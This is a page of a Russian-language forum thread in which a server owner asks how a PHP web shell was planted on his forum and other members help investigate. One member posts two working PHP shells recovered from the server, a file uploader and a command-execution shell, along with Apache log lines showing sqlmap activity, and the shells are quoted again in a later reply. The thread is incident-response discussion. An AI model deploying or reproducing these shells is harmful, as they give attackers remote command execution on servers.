Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
Добавлена поддержка utf8mb4
24-апр
Telegram группа
10-апр
Обновление PHP
11-апр
Раздача читов

3 страниц V   1 2 3

Залили шелл

, Как так вышло ребят?
Статус пользователя BaHeK
сообщение 14.12.2015, 11:53
Сообщение #21


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

kat5566, http://www.mysql.ru/docs/man/Privileges_provided.html


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 13:11
Сообщение #22


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(skitls187 @ 14.12.2015, 11:30) *
777 инетерсный файл


Форум какой? IPB>? Лицензияя?

Я так понял его залили через учётку админа на форуме. А пароль к учётке взяли из файла dop ban от мазданa [config.inc.php] так как права на этот файл стояли 777

Отредактировал: kat5566, - 14.12.2015, 13:20
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 14.12.2015, 13:25
Сообщение #23


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

kat5566, смотри логи apache/nginx/mysql, если баг в одном из веб-скрипотов, ты увидишь к какому файлу было много запросов, в mysql логах (если включено логирование ошибочных запросов) увидишь запросы, с помощью которых могли шелл залить
Доступ к VDS или что у тебя там есть только у тебя?


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 13:46
Сообщение #24


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(BaHeK @ 14.12.2015, 17:20) *
kat5566, смотри логи apache/nginx/mysql, если баг в одном из веб-скрипотов, ты увидишь к какому файлу было много запросов, в mysql логах (если включено логирование ошибочных запросов) увидишь запросы, с помощью которых могли шелл залить
Доступ к VDS или что у тебя там есть только у тебя?

Тачка собственная, стоит дома на балконе. Я пока просто закрыл внешний доступ к портам ssh и mysql.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 14.12.2015, 14:05
Сообщение #25


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

Цитата(kat5566 @ 14.12.2015, 14:41) *
Тачка собственная, стоит дома на балконе. Я пока просто закрыл внешний доступ к портам ssh и mysql.

Тогда права доступа не при чем, скорей всего sql инъекцией залили.


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя onotole
сообщение 14.12.2015, 15:12
Сообщение #26


Иконка группы

Стаж: 13 лет

Сообщений: 1572
Благодарностей: 1119
Полезность: 1550

Меценат Меценат
Цитата(BaHeK @ 14.12.2015, 15:01) *
Тогда права доступа не при чем, скорей всего sql инъекцией залили.

Скорее не sql, а xss
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 15:15
Сообщение #27


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(onotole @ 14.12.2015, 19:07) *
Скорее не sql, а xss

Какие вам логи предоставить, что-бы можно было определить, как же всё таки так вышло?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя MACH1NE
сообщение 14.12.2015, 16:30
Сообщение #28
Стаж: 10 лет

Сообщений: 112
Благодарностей: 16
Полезность: < 0

xss скорее всего
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя skitls187
сообщение 14.12.2015, 16:34
Сообщение #29


Стаж: 13 лет
Город: Москва

Сообщений: 390
Благодарностей: 100
Полезность: 139

В архив все пихай и на яндекс диск, apache nginx mysql


Я русский и мне за нас стыдно!!!
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 18:03
Сообщение #30


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(skitls187 @ 14.12.2015, 20:29) *
В архив все пихай и на яндекс диск, apache nginx mysql

ВотПрикрепленный файл  attack.zip ( 1,19 мегабайт ) Кол-во скачиваний: 18
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 14.12.2015, 18:08
Сообщение #31


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

kat5566, Логов апача за сегодняшний день недостаточно, посмотри дату создания файлов и присылай логи за этот день.


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя AZA
сообщение 14.12.2015, 18:11
Сообщение #32


Стаж: 11 лет

Сообщений: 479
Благодарностей: 173
Полезность: 490

kat5566, Залей на ргхост,а то я скачать не могу\


*
* puk
*
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 18:24
Сообщение #33


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(AZA @ 14.12.2015, 22:07) *
kat5566, Залей на ргхост,а то я скачать не могу\

Скачать не можешь, видимо потому что там в архиве сам ШЕЛЛ. ( Временно отключи антивирус.)
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя skitls187
сообщение 14.12.2015, 18:32
Сообщение #34


Стаж: 13 лет
Город: Москва

Сообщений: 390
Благодарностей: 100
Полезность: 139

АГа, только логи за посл неделю скинь хотя бы


Выше писала что в 777 есть функции для залития и чтения. Держите


В остальных 2ух файлах тоже есть
Код: 
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www/html/> <input type=submit name=upload value=upload></form>";}?>

Код: 
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>


Удаляйте файлы, меняйте пароли, смотрите в течении 30 дней просто глазком логи

Cкрытый текст
185.10.181.243 - - [14/Dec/2015:00:46:55 +0600] "POST /777.php HTTP/1.1" 200 7923 "http://blkgames.ru/777.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"
185.10.181.243 - - [14/Dec/2015:00:46:58 +0600] "POST /777.php HTTP/1.1" 200 7911 "http://blkgames.ru/777.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"
185.10.181.243 - - [14/Dec/2015:00:47:01 +0600] "POST /777.php HTTP/1.1" 200 8095 "http://blkgames.ru/777.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"


Еще вот
Cкрытый текст
185.10.181.243 - - [13/Dec/2015:23:34:43 +0600] "POST /tmpuhzcm.php HTTP/1.1" 200 357 "-" "Python-urllib/2.7"
185.10.181.243 - - [13/Dec/2015:23:34:43 +0600] "GET /tmpbjwfg.php?cmd=echo%20command%20execution%20test HTTP/1.1" 200 237 "-" "sqlmap/1.0-dev-89e3639 (http://sqlmap.org)"

185.10.181.243 - - [14/Dec/2015:00:20:00 +0600] "GET /555.php?act=f&f=tmpuhzcm.php&d=%2Fvar%2Fwww%2Fhtml& HTTP/1.1" 200 4445 "http://blkgames.ru/555.php?" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"

Видимо еще есть файлы, и их много 555.php///
999.php
185.10.181.243 - - [14/Dec/2015:00:11:59 +0600] "POST /888.php HTTP/1.1" 200 4762 "http://blkgames.ru/888.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"


Отредактировал: skitls187, - 14.12.2015, 18:33


Я русский и мне за нас стыдно!!!
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 18:34
Сообщение #35


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(BaHeK @ 14.12.2015, 22:04) *
kat5566, Логов апача за сегодняшний день недостаточно, посмотри дату создания файлов и присылай логи за этот день.

Прикрепленный файл  apache.zip ( 7,17 мегабайт ) Кол-во скачиваний: 5
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 18:43
Сообщение #36


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(skitls187 @ 14.12.2015, 22:28) *
Cкрытый текст
АГа, только логи за посл неделю скинь хотя бы


Выше писала что в 777 есть функции для залития и чтения. Держите


В остальных 2ух файлах тоже есть
Код: 
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www/html/> <input type=submit name=upload value=upload></form>";}?>

Код: 
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>


Удаляйте файлы, меняйте пароли, смотрите в течении 30 дней просто глазком логи

Cкрытый текст
185.10.181.243 - - [14/Dec/2015:00:46:55 +0600] "POST /777.php HTTP/1.1" 200 7923 "http://blkgames.ru/777.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"
185.10.181.243 - - [14/Dec/2015:00:46:58 +0600] "POST /777.php HTTP/1.1" 200 7911 "http://blkgames.ru/777.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"
185.10.181.243 - - [14/Dec/2015:00:47:01 +0600] "POST /777.php HTTP/1.1" 200 8095 "http://blkgames.ru/777.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"


Еще вот
Cкрытый текст
185.10.181.243 - - [13/Dec/2015:23:34:43 +0600] "POST /tmpuhzcm.php HTTP/1.1" 200 357 "-" "Python-urllib/2.7"
185.10.181.243 - - [13/Dec/2015:23:34:43 +0600] "GET /tmpbjwfg.php?cmd=echo%20command%20execution%20test HTTP/1.1" 200 237 "-" "sqlmap/1.0-dev-89e3639 (http://sqlmap.org)"

185.10.181.243 - - [14/Dec/2015:00:20:00 +0600] "GET /555.php?act=f&f=tmpuhzcm.php&d=%2Fvar%2Fwww%2Fhtml& HTTP/1.1" 200 4445 "http://blkgames.ru/555.php?" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"

Видимо еще есть файлы, и их много 555.php///
999.php
185.10.181.243 - - [14/Dec/2015:00:11:59 +0600] "POST /888.php HTTP/1.1" 200 4762 "http://blkgames.ru/888.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"

Спасибо, я это видел как бы... но так как не совсем разбираюсь в логах и вообще в php. Ничего не понял.
Кстате файл 777. Лежал в дериктории форума, его залили на форум с помощью учётки админа форума. А доступ к учётке получили через маздановский скрипт на котором были права 777... у меня там $dopban_sign = passforum (то есть пароль как от учётки на форуме.)

из всего этого я сделал вывод что если на маздановский скрипт config.inc.php стоят права 777 его можно прочесть.

Как то так...

И вообще вот ссылка на форум где человек, который залил шелл выложил все скрины взлома.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Bloo
сообщение 14.12.2015, 18:50
Сообщение #37


Стаж: 12 лет

Сообщений: 15547
Благодарностей: 6971
Полезность: 1206

kat5566, XF случайно не стоит?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 18:58
Сообщение #38


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(Bloo @ 14.12.2015, 22:46) *
kat5566, XF случайно не стоит?

Расшифруй пожалуйста что такое XF? Не понял просто что это...
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя skitls187
сообщение 14.12.2015, 19:12
Сообщение #39


Стаж: 13 лет
Город: Москва

Сообщений: 390
Благодарностей: 100
Полезность: 139

Цитата(kat5566 @ 14.12.2015, 19:54) *
Расшифруй пожалуйста что такое XF? Не понял просто что это...

XenForo, IPB = Invision Po...


Я русский и мне за нас стыдно!!!
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя kat5566
сообщение 14.12.2015, 19:18
Сообщение #40


Стаж: 11 лет

Сообщений: 275
Благодарностей: 49
Полезность: 138

Цитата(Bloo @ 14.12.2015, 22:46) *
kat5566, XF случайно не стоит?

Нет не стоит. Я уже вообще избавился от форума, всю дерикторию с форумом /del
Он мне как бы не нужен был... я так чисто ради интереса ставил...
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
« Предыдущая тема · Вопросы и помощь по скриптам и оформлению · Следующая тема »
 
3 страниц V   1 2 3
 		 Ответить в данную темуНачать новую тему
 
0 пользователей и 1 гостей читают эту тему:
Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный
Сообщить другу · Версия для печати

Powered By Invision Power Board  © 2005-2026 
Counter Strike Support Community